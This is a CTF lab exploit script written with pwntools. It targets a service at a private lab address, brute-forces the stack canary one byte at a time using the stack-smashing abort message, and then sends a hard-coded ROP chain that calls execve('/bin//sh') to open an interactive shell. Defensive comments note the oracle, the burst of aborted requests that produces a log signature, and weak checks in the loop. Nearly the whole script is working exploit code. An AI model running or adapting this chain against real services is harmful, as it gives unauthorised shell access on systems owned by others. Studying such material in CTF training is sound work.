# CTF lab script (pwntools) for the binary at ./dockerfile/bin/pwn.
#
# Flow as written: connect to the service, recover the 8-byte stack canary one
# byte at a time by watching for the "stack smashing detected" line, then send
# a single ROP payload whose gadget addresses are mostly hard-coded below.
#
# Defender's reading of what this script depends on (all visible in the code):
#   - the service returns the "stack smashing detected" text to the client on a
#     wrong guess; that line is the only oracle the byte-by-byte loop uses, so a
#     service that does not echo the abort text gives no such signal.
#   - the loop assumes the canary value stays the same across requests —
#     TODO confirm against the server (it would hold only if the handling
#     process is not re-executed per connection).
#   - up to 7 * 256 aborted requests from one client in quick succession is
#     the traffic pattern this produces; that burst of aborts is what a log
#     monitor would see.
from pwn import *
# elf = ELF("./pwn1")
elf = ELF("./dockerfile/bin/pwn")
context(arch=elf.arch, os=elf.os)
# 'debug' prints every byte sent and received; noisy, but it is what shows the
# abort text used as the oracle below.
context.log_level = 'debug'
# p = process([elf.path])
# Private (RFC 1918) lab address; the commented-out process() line above is the
# local alternative.
p = remote('192.168.45.46', 10002)
pause()  # blocks until Enter is pressed; no effect on the remote side
# Byte 0 of the canary is seeded as \x00 here and never searched; only the
# remaining 7 bytes are guessed.
canary = b'\x00'
while len(canary) < 8:
    info(len(canary))  # how many canary bytes are known so far
    for c in range(0x100):
        # 0x108 bytes of filler up to the canary slot, the bytes recovered so
        # far, then one candidate byte.
        p.sendafter("please input:\n", b"a" * 0x108 + canary + p8(c))
        # pause()
        # recvline_contains also returns an empty value on timeout, so a slow
        # reply (not only a correct byte) is accepted as a hit — a weak check.
        if not p.recvline_contains('stack smashing detected', timeout=1):
            canary += p8(c)
            break
    # NOTE(review): if none of the 256 candidates is accepted in a round, the
    # while loop retries the same position indefinitely.
canary = u64(canary)
success("canary: " + hex(canary))
# payload = b''
payload = b'a' * 0x108 + p64(canary)
payload += b'b' * 8  # 8 bytes between the canary slot and the return address
# ROP chain: the first two store/xor pairs write '/bin//sh' to .data and a zero
# qword to .data + 8; the pops then set rdi, rsi and rdx (rsi and rdx both
# point at the zeroed qword) before rax = 59 and the syscall gadget.
payload += p64(0x000000000040f23e) # pop rsi ; ret
payload += p64(0x00000000004c10e0) # @ .data
payload += p64(0x00000000004493d7) # pop rax ; ret
payload += b'/bin//sh'
payload += p64(0x000000000047c4e5) # mov qword ptr [rsi], rax ; ret
payload += p64(0x000000000040f23e) # pop rsi ; ret
payload += p64(0x00000000004c10e8) # @ .data + 8
payload += p64(0x00000000004437a0) # xor rax, rax ; ret
payload += p64(0x000000000047c4e5) # mov qword ptr [rsi], rax ; ret
payload += p64(0x00000000004018c2) # pop rdi ; ret
payload += p64(0x00000000004c10e0) # @ .data
payload += p64(0x000000000040f23e) # pop rsi ; ret
payload += p64(0x00000000004c10e8) # @ .data + 8
payload += p64(0x00000000004017cf) # pop rdx ; ret
payload += p64(0x00000000004c10e8) # @ .data + 8
payload += p64(0x00000000004437a0) # xor rax, rax ; ret
# The last two gadgets are located in the ELF at run time; the hard-coded
# addresses above are only valid for this exact build of the binary.
payload += p64(next(elf.search(asm('pop rax;ret'), executable=True)))
payload += p64(59)
payload += p64(next(elf.search(asm('syscall'), executable=True)))
pause()  # blocks until Enter is pressed before the final request is sent
p.sendafter("please input:\n", payload)
p.interactive()